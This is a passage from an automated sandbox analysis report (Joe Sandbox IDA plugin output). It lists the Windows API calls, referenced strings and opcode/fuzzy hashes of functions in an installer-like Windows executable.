                                                                          • Opcode Fuzzy Hash: a4330348a8b5add72bb88b34234a092f9c4bcb0268f2a71967034c917c80e18f
                                                                          • Instruction Fuzzy Hash: 91510774A00141ABDB10EF6ADC816DA7BF9AF09304B1585BBF904E73A6D738DE41CB58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0041BE98
                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0041BEA7
                                                                          • GetBitmapBits.GDI32(?,?,?), ref: 0041BEF8
                                                                          • GetBitmapBits.GDI32(?,?,?), ref: 0041BF06
                                                                          • DeleteObject.GDI32(?), ref: 0041BF0F
                                                                          • DeleteObject.GDI32(?), ref: 0041BF18
                                                                          • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BF35
                                                                          Similarity
                                                                          • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                          • String ID:
                                                                          • API String ID: 1030595962-0
                                                                          • Opcode ID: def8fbccf1c24a02d994da4c86886dac4c2dead876cc1f6ae6625c60910ee1ab
                                                                          • Instruction ID: df24cebc7fa487ee98114de19092ccc5a22b1f53c044ef6357ba81a281e40f4e
                                                                          • Opcode Fuzzy Hash: def8fbccf1c24a02d994da4c86886dac4c2dead876cc1f6ae6625c60910ee1ab
                                                                          • Instruction Fuzzy Hash: A4510571E00219AFCB14DFA9D8819EEB7F9EF48314B10446AF914E7391D738AD81CB64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CE6E
                                                                          • 73A24620.GDI32(00000000,00000026), ref: 0041CE8D
                                                                          • 73A18830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CEF3
                                                                          • 73A122A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CF02
                                                                          • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CF6C
                                                                          • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041CFAA
                                                                          • 73A18830.GDI32(?,?,00000001,0041CFDC,00000000,00000026), ref: 0041CFCF
                                                                          Similarity
                                                                          • API ID: Stretch$A18830$A122A24620BitsMode
                                                                          • String ID:
                                                                          • API String ID: 430401518-0
                                                                          • Opcode ID: f1e44e616a31fadfa248c6df7b1b8cee01c2aa03eac239bf1acaf6848e72f817
                                                                          • Instruction ID: 0295d75a013be80ecc2d975aeb153abe1d20fbb24d7cab5e263b7fb8805ed029
                                                                          • Opcode Fuzzy Hash: f1e44e616a31fadfa248c6df7b1b8cee01c2aa03eac239bf1acaf6848e72f817
                                                                          • Instruction Fuzzy Hash: 6A512970644600AFDB14DFA8C985FABBBF9AF08304F10459AF544DB292C778ED80CB58
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,?,?), ref: 004551E2
                                                                            • Part of subcall function 004241EC: GetWindowTextA.USER32(?,?,00000100), ref: 0042420C
                                                                            • Part of subcall function 0041EE14: GetCurrentThreadId.KERNEL32 ref: 0041EE63
                                                                            • Part of subcall function 0041EE14: 73A25940.USER32(00000000,0041EDC4,00000000,00000000,0041EE80,?,00000000,0041EEB7,?,0042E804,?,00000001), ref: 0041EE69
                                                                            • Part of subcall function 00424234: SetWindowTextA.USER32(?,00000000), ref: 0042424C
                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00455249
                                                                          • TranslateMessage.USER32(?), ref: 00455267
                                                                          • DispatchMessageA.USER32(?), ref: 00455270
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: Message$TextWindow$A25940CurrentDispatchSendThreadTranslate
                                                                          • String ID: [Paused]
                                                                          • API String ID: 3047529653-4230553315
                                                                          • Opcode ID: c756cc2506f3dbf4f4bb9941ae66d94f60b4aee530b10c6c59ca1a5cc46b1d7b
                                                                          • Instruction ID: f2f6b487c86353f72898e4c8af60e590ce20add486516cec5e8e630063df4c80
                                                                          • Opcode Fuzzy Hash: c756cc2506f3dbf4f4bb9941ae66d94f60b4aee530b10c6c59ca1a5cc46b1d7b
                                                                          • Instruction Fuzzy Hash: 5731C3319086486ECB01DBB5DC51FEEBBB8EB49314F5140B7F800E3692D67C990ACB69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetCursor.USER32(00000000,0046731B), ref: 00467298
                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 004672A6
                                                                          • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046731B), ref: 004672AC
                                                                          • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046731B), ref: 004672B6
                                                                          • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046731B), ref: 004672BC
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: Cursor$LoadSleep
                                                                          • String ID: CheckPassword
                                                                          • API String ID: 4023313301-1302249611
                                                                          • Opcode ID: 7853287eaffac6cb94d744d74196ba731cdf5e518dc0597f07a7724a604def1d
                                                                          • Instruction ID: e79c91264cf403656a7ecb179e9d02605dd9e3cded0af3c011d04f8f5d04b07e
                                                                          • Opcode Fuzzy Hash: 7853287eaffac6cb94d744d74196ba731cdf5e518dc0597f07a7724a604def1d
                                                                          • Instruction Fuzzy Hash: A1318134644644AFD711EF69C88AF9A7BE4AF45308F5580B6FC00AF3A2DB789D40DB49
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00457B93
                                                                          Strings
                                                                          • .NET Framework CreateAssemblyCache function failed, xrefs: 00457BB6
                                                                          • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00457B9E
                                                                          • Failed to load .NET Framework DLL "%s", xrefs: 00457B78
                                                                          • CreateAssemblyCache, xrefs: 00457B8A
                                                                          • Fusion.dll, xrefs: 00457B33
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                          • API String ID: 190572456-3990135632
                                                                          • Opcode ID: 84556e50aacdd0334a8723a64b5ce391b8f5f4a0f005a9f218f2c1a3e260840a
                                                                          • Instruction ID: 54d6081f599df52c860fdc2f47534742524e01ae44f48fc011e119f3f1d07f73
                                                                          • Opcode Fuzzy Hash: 84556e50aacdd0334a8723a64b5ce391b8f5f4a0f005a9f218f2c1a3e260840a
                                                                          • Instruction Fuzzy Hash: FA319A71E04609AFCB11EFA5D88169FB7B8EF44315F50857BE814E7382D7389E088B99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0041BFB8: GetObjectA.GDI32(?,00000018), ref: 0041BFC5
• GetFocus.USER32 ref: 0041C0D8
• 73A1A570.USER32(?), ref: 0041C0E4
• 73A18830.GDI32(?,?,00000000,00000000,0041C163,?,?), ref: 0041C105
• 73A122A0.GDI32(?,?,?,00000000,00000000,0041C163,?,?), ref: 0041C111
• GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C128
• 73A18830.GDI32(?,00000000,00000000,0041C16A,?,?), ref: 0041C150
• 73A1A480.USER32(?,?,0041C16A,?,?), ref: 0041C15D
Similarity
• API ID: A18830$A122A480A570BitsFocusObject
• String ID:
• API String ID: 2231653193-0
• Opcode ID: 4dda706c4d7f92d041f49e6fbb3e4bdf95359f21a4b7263d3cbf0515cfc8cf41
• Instruction ID: be6d8328aec04e85a436dd0cf8ae2147a44d9b66c6d411dca3268b31211d8f12
• Opcode Fuzzy Hash: 4dda706c4d7f92d041f49e6fbb3e4bdf95359f21a4b7263d3cbf0515cfc8cf41
• Instruction Fuzzy Hash: B2116A71A40618BFDB10DBA9CC86FAFB7FCEF48700F54446AB514E7281D6789D008B68
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0047DF38), ref: 0047DF1D
Strings
Similarity
• API ID: CloseOpen
• String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
• API String ID: 47109696-2530820420
• Opcode ID: 3d421fe5b9d66a13501841859f0a8451f50d73c39307a227430f230348f08d3b
• Instruction ID: 7da821122e4f9b7c3381c3a81ebb3182cabfb864ff3682cb6973b5219dc9143e
• Opcode Fuzzy Hash: 3d421fe5b9d66a13501841859f0a8451f50d73c39307a227430f230348f08d3b
• Instruction Fuzzy Hash: 65118E30B24204AADB01DB66C802BDF7BB9EF15318F61C0B7F406E7286EB79D9018758
Uniqueness
Uniqueness Score: -1.00%

APIs
• SelectObject.GDI32(00000000,?), ref: 0041B3E0
• SelectObject.GDI32(?,00000000), ref: 0041B3EF
• StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B41B
• SelectObject.GDI32(00000000,00000000), ref: 0041B429
• SelectObject.GDI32(?,00000000), ref: 0041B437
• DeleteDC.GDI32(00000000), ref: 0041B440
• DeleteDC.GDI32(?), ref: 0041B449
Similarity
• API ID: ObjectSelect$Delete$Stretch
• String ID:
• API String ID: 1458357782-0
• Opcode ID: 5d8119482a24acdf9dbc4f71c87d898742faec31f652e860e6f74a5bb4e0366a
• Instruction ID: 073f11bba2386bee955988a390c3df6f0cbda7ed7a331810ab0cae2060ca734e
• Opcode Fuzzy Hash: 5d8119482a24acdf9dbc4f71c87d898742faec31f652e860e6f74a5bb4e0366a
• Instruction Fuzzy Hash: F9114C72E40659ABDF10D6D9D985FAFB3BCEF08704F048456B614FB242C678A8418B54
Uniqueness
Uniqueness Score: -1.00%

APIs
• 73A1A570.USER32(00000000,?,?,00000000), ref: 0048F451
  • Part of subcall function 0041A158: CreateFontIndirectA.GDI32(?), ref: 0041A217
• SelectObject.GDI32(00000000,00000000), ref: 0048F473
• GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,0048F9C9), ref: 0048F487
• GetTextMetricsA.GDI32(00000000,?), ref: 0048F4A9
• 73A1A480.USER32(00000000,00000000,0048F4D3,0048F4CC,?,00000000,?,?,00000000), ref: 0048F4C6
Strings
• ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 0048F47E
Similarity
• API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
• String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
• API String ID: 1435929781-222967699
• Opcode ID: aec2ce94ca0a2fe66ea55faeebd29ac8e829e062f1f7dec7e9667981b672f2ca
• Instruction ID: 36afa4b657b34b8522d1c231de5a8c505386f3c2143f3af581d88b388b6b6632
• Opcode Fuzzy Hash: aec2ce94ca0a2fe66ea55faeebd29ac8e829e062f1f7dec7e9667981b672f2ca
• Instruction Fuzzy Hash: BF016575A04608BFEB01EAA5CC41F6FB7ECDB49704F514477B604E7281D6789D008B68
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCursorPos.USER32 ref: 0042331F
• WindowFromPoint.USER32(?,?), ref: 0042332C
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0042333A
• GetCurrentThreadId.KERNEL32 ref: 00423341
• SendMessageA.USER32(00000000,00000084,?,?), ref: 0042335A
• SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423371
• SetCursor.USER32(00000000), ref: 00423383
Similarity
• API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
• String ID:
• API String ID: 1770779139-0
• Opcode ID: 60706cbef7e7fd969e6117079794ea181f59045882c2055e97c618c29bc945ad
• Instruction ID: 4e500bdd1cb7c406dcecfc45487f359b17b305850d12e3c552a5b3a09f906ed3
• Opcode Fuzzy Hash: 60706cbef7e7fd969e6117079794ea181f59045882c2055e97c618c29bc945ad
• Instruction Fuzzy Hash: EC01D4223043103AD620BB795C86E3F26A8CFC5B55F50417FB909BE283DA3D8D0163AD
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(user32.dll), ref: 0048F274
• GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 0048F281
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0048F28E
Strings
Similarity
• API ID: AddressProc$HandleModule
• String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
• API String ID: 667068680-2254406584
• Opcode ID: 1e6e599f15a85ca3434ac6dc2256e25d95c130a7a50b60adec5cf6b1919fb023
• Instruction ID: 320adb3965b6f495dc5cbca51cbfa6a5691965cf1facb545b0a128d01ebcbff3
• Opcode Fuzzy Hash: 1e6e599f15a85ca3434ac6dc2256e25d95c130a7a50b60adec5cf6b1919fb023
• Instruction Fuzzy Hash: FBF0CDAAB41B1566D62072B60C82B7F618CCB81770F1408B7BD04A62C2EDAA8D0943BD
Uniqueness
Uniqueness Score: -1.00%

APIs
• MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00455EE0
• GetExitCodeProcess.KERNEL32(?,^%I), ref: 00455F01
• CloseHandle.KERNEL32(?,00455F34,?,?,OgE,00000000,00000000), ref: 00455F27
Strings
Similarity
• API ID: CloseCodeExitHandleMultipleObjectsProcessWait
• String ID: GetExitCodeProcess$MsgWaitForMultipleObjects$^%I
• API String ID: 2573145106-2465217090
• Opcode ID: eae7e9bc5b852605da3e4c9cab9726f535817d301444d626726a3ca8f125a080
• Instruction ID: 06bcc0b7b5ae778b55f830a6e63720fcc7028796f4e4f28f42062f96750590e8
• Opcode Fuzzy Hash: eae7e9bc5b852605da3e4c9cab9726f535817d301444d626726a3ca8f125a080
• Instruction Fuzzy Hash: 3401A271600604AFDB10EB99CC22E2E73A8EB49715F504177F810DB7D3DA3C9D04DA18
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045B9B5
• GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045B9C5
• GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045B9D5
Strings
Similarity
• API ID: AddressProc
• String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
• API String ID: 190572456-212574377
• Opcode ID: 622227cba5b86ca8fccab1400ad34dc8923e22f3f5578f85d6d1e5fdf3acff14
• Instruction ID: bb37bbad0c8d10f251c0aa8c4ec345e64f50a4bb6c8e2d07f97ee2e6ad287d5c
• Opcode Fuzzy Hash: 622227cba5b86ca8fccab1400ad34dc8923e22f3f5578f85d6d1e5fdf3acff14
• Instruction Fuzzy Hash: A0F012B1600745DEEB14DF77EC41B2626A9E7E8326F14803BD8065936AE37C080ADE5C
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(oleacc.dll,?,0044E91D), ref: 0044C07F
• GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C090
• GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C0A0
Strings
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
• API String ID: 2238633743-1050967733
• Opcode ID: b2562950c71cd23530e2a56bc8551780a47537d70dbbb9d9fb25e2bb869be04b
• Instruction ID: ac0d725b3ee157e0591d3c5333f5e4ccdb9c4df60658dd2baa23885d1ab8f8cf
• Opcode Fuzzy Hash: b2562950c71cd23530e2a56bc8551780a47537d70dbbb9d9fb25e2bb869be04b
• Instruction Fuzzy Hash: 82F01270142389CBFBA0EBF5EDC9F123294D3A170DF18517BA0019A2E2C7BD4445CA0D
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0048FAFA,QueryCancelAutoPlay,004929A3), ref: 0042E76A
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E770
• InterlockedExchange.KERNEL32(00494660,00000001), ref: 0042E781
• ChangeWindowMessageFilter.USER32(0000C1C2,00000001), ref: 0042E792
Strings
Similarity
• API ID: AddressChangeExchangeFilterHandleInterlockedMessageModuleProcWindow
• String ID: ChangeWindowMessageFilter$user32.dll
• API String ID: 1365377179-2498399450
• Opcode ID: 34d0edbb10ef2500e3b808e5a736a7631458895e216e2905709a8920c88350df
• Instruction ID: 4a434d6ebf99a211ad985c76b6619d27f745a5091495b81aefed992397c45a81
• Opcode Fuzzy Hash: 34d0edbb10ef2500e3b808e5a736a7631458895e216e2905709a8920c88350df
• Instruction Fuzzy Hash: 7BE0ECE1741310EAEAA0BBA2FC8AF5A399497E5719F50003BF104651E2C6BD0C41C91C
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,00492999), ref: 00473B76
• GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00473B83
• GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00473B93
Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModule
                                                                          • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                          • API String ID: 667068680-222143506
                                                                          • Opcode ID: 315d5260c9f678ade1a0cc40628bf4d981144f5db400e838a2cc1962c1f8332f
                                                                          • Instruction ID: dcc6af067bf3078790d87b20fbc0612a0ccff274e7f94df7ba8b603e8e0053f1
                                                                          • Opcode Fuzzy Hash: 315d5260c9f678ade1a0cc40628bf4d981144f5db400e838a2cc1962c1f8332f
                                                                          • Instruction Fuzzy Hash: 89C012F0241700EDDA10AFF15CC2D7A2148E540B2A720817BF448791C7D67C6E055A1D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

APIs
• GetFocus.USER32 ref: 0041B6B5
• 73A1A570.USER32(?), ref: 0041B6C1
• 73A18830.GDI32(00000000,?,00000000,00000000,0041B78C,?,?), ref: 0041B6F6
• 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041B78C,?,?), ref: 0041B702
• 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041B76A,?,00000000,0041B78C,?,?), ref: 0041B730
• 73A18830.GDI32(00000000,00000000,00000000,0041B771,?,?,00000000,00000000,0041B76A,?,00000000,0041B78C,?,?), ref: 0041B764
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: A18830$A122A26310A570Focus
• String ID:
• API String ID: 3906783838-0
• Opcode ID: 8ecdb598e1a4996df05dfcc0867a12236d6d7e85a0aef6664a328bbccf7dd41e
• Instruction ID: 06dd750ffd38faa4806619bbf82afcbb6c92213719a6bc319da55d16d67b79f4
• Opcode Fuzzy Hash: 8ecdb598e1a4996df05dfcc0867a12236d6d7e85a0aef6664a328bbccf7dd41e
• Instruction Fuzzy Hash: 8E512C70A00609AFDF11DFA9C895AEEBBB8FF49704F104466F510A7390D7789981CBA9
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetFocus.USER32 ref: 0041B987
• 73A1A570.USER32(?), ref: 0041B993
• 73A18830.GDI32(00000000,?,00000000,00000000,0041BA59,?,?), ref: 0041B9CD
• 73A122A0.GDI32(00000000,00000000,?,00000000,00000000,0041BA59,?,?), ref: 0041B9D9
• 73A26310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BA37,?,00000000,0041BA59,?,?), ref: 0041B9FD
• 73A18830.GDI32(00000000,00000000,00000000,0041BA3E,?,?,00000000,00000000,0041BA37,?,00000000,0041BA59,?,?), ref: 0041BA31
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: A18830$A122A26310A570Focus
• String ID:
• API String ID: 3906783838-0
• Opcode ID: d652c417c9a8b03d43389ce1c345903e188ace57285e6eb171d305152e46db0d
• Instruction ID: 49b1e422d63778e1935042bf56866254f806bc58ba08b8974fd4ee1451f7b7cb
• Opcode Fuzzy Hash: d652c417c9a8b03d43389ce1c345903e188ace57285e6eb171d305152e46db0d
• Instruction Fuzzy Hash: 4F512B74A006089FCB11DFA9C895AAEBBF9FF48700F118066F904EB750D7389D40CBA8
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetFocus.USER32 ref: 0041B4EE
• 73A1A570.USER32(?,00000000,0041B5C8,?,?,?,?), ref: 0041B4FA
• 73A24620.GDI32(?,00000068,00000000,0041B59C,?,?,00000000,0041B5C8,?,?,?,?), ref: 0041B516
• 73A4E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B59C,?,?,00000000,0041B5C8,?,?,?,?), ref: 0041B533
• 73A4E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B59C,?,?,00000000,0041B5C8), ref: 0041B54A
• 73A1A480.USER32(?,?,0041B5A3,?,?), ref: 0041B596
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: E680$A24620A480A570Focus
• String ID:
• API String ID: 3709697839-0
• Opcode ID: 4a4a7d32ada1a740a668c755e1a66010c357d4bec648edb4ace877a09f191135
• Instruction ID: a6e4b16520c9e4bc630ca31e265eea6a5194191570467489af8bdb357d288b52
• Opcode Fuzzy Hash: 4a4a7d32ada1a740a668c755e1a66010c357d4bec648edb4ace877a09f191135
• Instruction Fuzzy Hash: 2D41C571A04254AFDF10DFA9C885AAFBBB5EF49704F1484AAE900E7351D2389D10CBA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetLastError.KERNEL32(00000057,00000000,0045B43C,?,?,?,?,00000000), ref: 0045B3DB
• SetLastError.KERNEL32(00000000,00000002,?,?,?,0045B4A8,?,00000000,0045B43C,?,?,?,?,00000000), ref: 0045B41A
Strings
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: ErrorLast
• String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
• API String ID: 1452528299-1580325520
• Opcode ID: 396c5408a265f2c87cad4762a3c8b1d35ea086b60968f103d8f30e223deffe3c
• Instruction ID: 700096bd68f309f90710c381aa7dde6ba0fdda2f7fc45a32d8085176b984ac24
• Opcode Fuzzy Hash: 396c5408a265f2c87cad4762a3c8b1d35ea086b60968f103d8f30e223deffe3c
• Instruction Fuzzy Hash: F911BB35204204AFD721DAA5C981B6E779DDB49306F708077BD0166383D77C9F0A95AE
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetSystemMetrics.USER32(0000000B), ref: 0041BD45
• GetSystemMetrics.USER32(0000000C), ref: 0041BD4F
• 73A1A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BD59
• 73A24620.GDI32(00000000,0000000E,00000000,0041BDCC,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BD80
• 73A24620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BDCC,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BD8D
• 73A1A480.USER32(00000000,00000000,0041BDD3,0000000E,00000000,0041BDCC,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDC6
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: A24620MetricsSystem$A480A570
• String ID:
• API String ID: 4042297458-0
• Opcode ID: 1c903c0536bb10720712021bcda66a401c12054db1b22576e6386974878fa910
• Instruction ID: 8181195c8b7ace5e518c23098daf85fccaa127339f370ed271397b7e8efdaee2
• Opcode Fuzzy Hash: 1c903c0536bb10720712021bcda66a401c12054db1b22576e6386974878fa910
• Instruction Fuzzy Hash: 1F212C74E046499FEB04EFA9C941BEEB7B4EB48714F10402AF514B7680D7785940CFA9
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetWindowLongA.USER32(?,000000EC), ref: 00478D66
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,004687F2), ref: 00478D8C
• GetWindowLongA.USER32(?,000000EC), ref: 00478D9C
• SetWindowLongA.USER32(?,000000EC,00000000), ref: 00478DBD
• ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 00478DD1
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 00478DED
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_0RWRPBSuDx.jbxd
Similarity
• API ID: Window$Long$Show
• String ID:
• API String ID: 3609083571-0
• Opcode ID: b84e9f19ff0ee670dcbfc2807fcaec7768f162b85f5824c815ec19dbe8d39123
• Instruction ID: 849554ad505ceeff35d37c7ff58508bf2e1726df1cd7e8e141310fbeec4833cd
• Opcode Fuzzy Hash: b84e9f19ff0ee670dcbfc2807fcaec7768f162b85f5824c815ec19dbe8d39123
• Instruction Fuzzy Hash: 20014CB1681210ABD610D768CD85F663798AB5E331F06436AB558DB3E3CA3DDC009B08
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0041A650: CreateBrushIndirect.GDI32 ref: 0041A6BB
• UnrealizeObject.GDI32(00000000), ref: 0041B1EC
• SelectObject.GDI32(?,00000000), ref: 0041B1FE
• SetBkColor.GDI32(?,00000000), ref: 0041B221
• SetBkMode.GDI32(?,00000002), ref: 0041B22C
• SetBkColor.GDI32(?,00000000), ref: 0041B247
• SetBkMode.GDI32(?,00000001), ref: 0041B252
  • Part of subcall function 00419FC8: GetSysColor.USER32(?), ref: 00419FD2
Memory Dump Source
• Source File: 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2867685461.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867770841.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2867794838.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
